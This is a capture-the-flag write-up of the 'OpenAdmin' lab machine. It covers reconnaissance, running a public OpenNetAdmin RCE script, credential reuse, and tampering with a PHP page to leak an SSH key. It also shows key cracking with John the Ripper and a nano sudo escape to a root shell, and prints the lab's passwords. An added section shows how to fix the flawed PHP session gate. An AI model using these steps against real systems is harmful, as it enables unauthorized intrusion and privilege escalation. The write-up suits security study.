OpenAdmin writeup

OpenAdmin - 10.10.10.171



First we run nmap: nmap -A -T4 -p- -oN nmap.txt 10.10.10.171 and get the following output:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

So only 2 ports are open: 22 for SSH and 80 for Apache. We can already see the webserver only serves the default test page, so let's start up gobuster and see if we can find something else: gobuster dir -u http://10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt and get the following output:

/music (Status: 301)
/artwork (Status: 301)
/sierra (Status: 301)
/server-status (Status: 403)

Looks like there is more running on the server than just a test page. When we look at the /music/ folder we get served a webpage with a lot of non-working links, except for one: the login link, which redirects us to /ona/, an OpenNetAdmin page that also displays its version: 18.1.1.

A quick google search lands us on this exploitdb page; looks like there is an RCE for this version of OpenNetAdmin. All we have to do is copy the script and run it with the URL like so: ./47691.sh http://10.10.10.171/ona/ to get a shell, or actually not a shell, but a way to send commands to the server. If we have a quick look at the exploit we can see that every request uses a new connection, so no state is kept between commands, forcing us to reference everything relative to the current path.

After some snooping around with ls and cat we find a file, local/config/database_settings.inc.php, which holds a password:

$ cat local/config/database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

Now we have a look at the home directories and see there are 2 users on the system:

  • jimmy
  • joanna

And lucky for us jimmy reuses the password we just found, so now we can login with ssh. Using the groups command we can see that jimmy is a member of the internal group; to see if there are any files owned by this group we run the following command: find / -type f -group internal 2>/dev/null and find there are 3 files on the system in /var/www/internal/:

  • index.php
  • main.php
  • logout.php

The main.php file looks very interesting:

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

So if we can make a call to this file we should be able to read joanna's id_rsa file. But we need $_SESSION['username'] to be set. Good thing we have write access, so we can strip the session check and save the file as:

<?php
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
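As an added example, not part of the original writeup or of the files on the box: the gate in main.php is also broken on its own, because header() only queues a Location header while PHP keeps executing the rest of the script, so whatever is echoed afterwards is still sent to an unauthenticated client. Below is the original gate next to a fixed version that exits after the redirect and never shells out from a web page:

```php
<?php
// Added example, not from the box: the gate from main.php next to a fixed one.

// Original logic. header() only adds a response header; PHP continues past the
// if-block, so everything echoed afterwards is still sent to an anonymous client.
function gate_original(): void
{
    session_start();
    if (!isset($_SESSION['username'])) {
        header("Location: /index.php");
    }
    // ... falls through: the shell_exec('cat .../id_rsa') would run here for everyone
}

// Fixed logic: terminate the script right after the redirect, so the body below
// is only ever produced for a logged-in session.
function gate_fixed(): void
{
    session_start();
    if (empty($_SESSION['username'])) {
        header("Location: /index.php", true, 302);
        exit;
    }
}

gate_fixed();

// Page body, reached only for authenticated users. Secrets such as private keys
// never belong in a web response; render a normal, HTML-escaped page instead.
$user = htmlspecialchars($_SESSION['username'], ENT_QUOTES, 'UTF-8');
echo "<html><h3>Logged in as {$user}</h3>";
echo 'Click here to logout <a href="logout.php" title="Logout">Session</a></html>';
```

The same applies to every PHP handler that redirects on a failed check: without exit (or die) after header(), the rest of the file still runs.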

Now we need to call this page. nmap didn't show any other ports open, so let's run netstat -l to see if there are any other ports in use:

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 localhost:mysql         0.0.0.0:*               LISTEN     
tcp        0      0 localhost:52846         0.0.0.0:*               LISTEN     
tcp        0      0 localhost:domain        0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN     
tcp6       0      0 [::]:http               [::]:*                  LISTEN     
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN     
udp        0      0 localhost:domain        0.0.0.0:*

Looks like something is listening on localhost port 52846, so let's use curl to connect: curl 127.0.0.1:52846/main.php and now we can see the id_rsa key!

We copy the key and, as we can see from its header, it is encrypted, so we still need to crack the passphrase. We use ssh2john to generate a hash John the Ripper can handle: /usr/share/john/ssh2john id_rsa > id4john and let JTR crack it: john id4john --wordlist=/usr/share/wordlists/rockyou.txt. Now we get the passphrase bloodninjas back and are able to login as joanna. Don't forget to set the right permissions on the id_rsa key first: chmod 600 id_rsa

Now that we are on the system as joanna we run sudo -l to check our sudo rights and see that we are allowed to run /bin/nano /opt/priv as root. So we check GTFOBins for nano, and we should be able to get a shell using the following key sequence and command inside nano running as root:

^R^X
reset; sh 1>&0 2>&0

And that's it, we have a shell as root on the system!